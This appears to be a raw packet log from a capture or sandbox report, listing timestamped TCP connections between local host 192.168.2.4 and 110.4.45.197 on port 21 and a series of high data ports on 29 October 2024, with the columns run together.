                                                      Oct 29, 2024 02:33:50.411189079 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.411365986 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.411377907 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.411560059 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.411631107 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.411662102 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.411680937 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.411695957 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.412069082 CET5110650013110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:50.412115097 CET5001351106192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:50.437527895 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.149910927 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.203655005 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.249042034 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.249418974 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.254976034 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.254991055 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255032063 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255090952 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255116940 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.255178928 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255191088 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255222082 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.255239964 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255254030 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255286932 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255286932 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.255301952 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.255340099 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.255417109 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.260540962 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.260608912 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.260629892 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.260642052 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.260719061 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.260723114 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.260735035 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.260881901 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.260934114 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.261055946 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.261125088 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.266148090 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.266402006 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.266573906 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.267100096 CET6162350014110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.267225027 CET5001461623192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.298868895 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.346889973 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.353224039 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.679275990 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.679757118 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.686944962 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:51.687114000 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.687212944 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:51.692537069 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.010952950 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.011281967 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.017093897 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.017157078 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.583646059 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.586435080 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.592019081 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592035055 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592047930 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592061043 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592076063 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592082977 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.592098951 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592112064 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592124939 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.592133999 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592145920 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592164040 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.592197895 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.592252016 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.592314005 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.597589970 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.597647905 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.597661018 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.597675085 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.597687960 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.597721100 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.597734928 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.597747087 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.597748041 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.597793102 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.597800970 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.597862005 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.597903013 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.603188038 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.603426933 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.603441954 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.603889942 CET6530150015110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:52.603940010 CET5001565301192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:52.625046968 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:53.349600077 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:53.390666008 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:53.581366062 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:53.586736917 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:53.912455082 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:53.915210009 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:53.920661926 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:53.922966003 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:53.922967911 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:53.928385973 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.842539072 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.842761993 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848189116 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848198891 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848226070 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848236084 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848270893 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848366976 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848411083 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848530054 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848541975 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848567963 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848577976 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848598003 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848606110 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848638058 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848648071 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848681927 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848716974 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.848727942 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.848762035 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.853590012 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.853605986 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.853640079 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.853720903 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.853730917 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.853739023 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.853746891 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.853758097 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.853770018 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.853785992 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.853816032 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.853993893 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.854002953 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.854046106 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.854120016 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.854151964 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.854182005 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.859030008 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.859087944 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.859241009 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.859349966 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.859383106 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.859392881 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.859518051 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.859982014 CET5592350016110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:54.860025883 CET5001655923192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:54.890666008 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:55.655571938 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:55.703178883 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:57.330674887 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:57.336184025 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:57.662415981 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:57.665396929 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:57.670841932 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:57.673137903 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:57.673141003 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:57.678494930 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.598516941 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.598777056 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.604310036 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604320049 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604329109 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604343891 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604362011 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604366064 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.604372025 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604382992 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604420900 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604429960 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604454994 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.604487896 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.604548931 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.609764099 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.609774113 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.609833002 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.609849930 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.609858990 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.609886885 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.609891891 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.609944105 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.609942913 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.609954119 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.610011101 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.610054016 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.610146999 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.610156059 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.615271091 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.615361929 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.615417004 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.615426064 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.615850925 CET6351150017110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:58.615922928 CET5001763511192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:58.640677929 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:33:59.388549089 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:33:59.438891888 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:00.348042011 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:00.353498936 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:00.679722071 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:00.680135012 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:00.685509920 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:00.685564995 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:00.685641050 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:00.690999985 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.614918947 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.617330074 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.622872114 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622881889 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622906923 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622916937 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622929096 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622940063 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622958899 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622968912 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622977972 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.622982025 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.622992039 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.623035908 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.628314972 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628371954 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628382921 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628392935 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628407955 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.628438950 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628444910 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.628460884 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628489017 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628489017 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.628504038 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.628570080 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628580093 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628607988 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.628638983 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.628705025 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.633718967 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.633935928 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.634042978 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.634342909 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.634562016 CET5479850018110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:01.634699106 CET5001854798192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:01.671998024 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:02.392740011 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:02.437566042 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:06.626138926 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:06.631697893 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:06.959049940 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:06.959459066 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:06.964828014 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:06.964890957 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:06.965001106 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:06.970297098 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.904768944 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.905086994 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.912130117 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.912141085 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.912147999 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.912156105 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.912164927 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.912199974 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.912283897 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.913746119 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.913762093 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.913780928 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.913789034 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.913824081 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.913851023 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.915366888 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917211056 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.917473078 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917484045 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917530060 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917566061 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.917659044 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917668104 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917675972 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917726040 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.917743921 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.917824984 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.917979002 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.917998075 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.918173075 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.919197083 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.919248104 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.920609951 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.924177885 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.924189091 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.924779892 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.924817085 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.924824953 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.925437927 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.925489902 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.925498009 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.925720930 CET5308250019110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:07.925940037 CET5001953082192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:07.954898119 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:08.725568056 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:08.765703917 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:13.004611015 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:13.010046005 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:13.336118937 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:13.337481976 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:13.342792034 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:13.342983007 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:13.343161106 CET4991921192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:13.348481894 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.250581026 CET2149919110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.250865936 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256225109 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256263018 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256273985 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256285906 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256297112 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256306887 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256345987 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256361961 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256381989 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256397963 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256418943 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256433010 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256455898 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256468058 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256474018 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256491899 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256509066 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.256517887 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.256555080 CET5002063207192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:14.262013912 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262022972 CET6320750020110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:14.262057066 CET5002063207192.168.2.4110.4.45.197
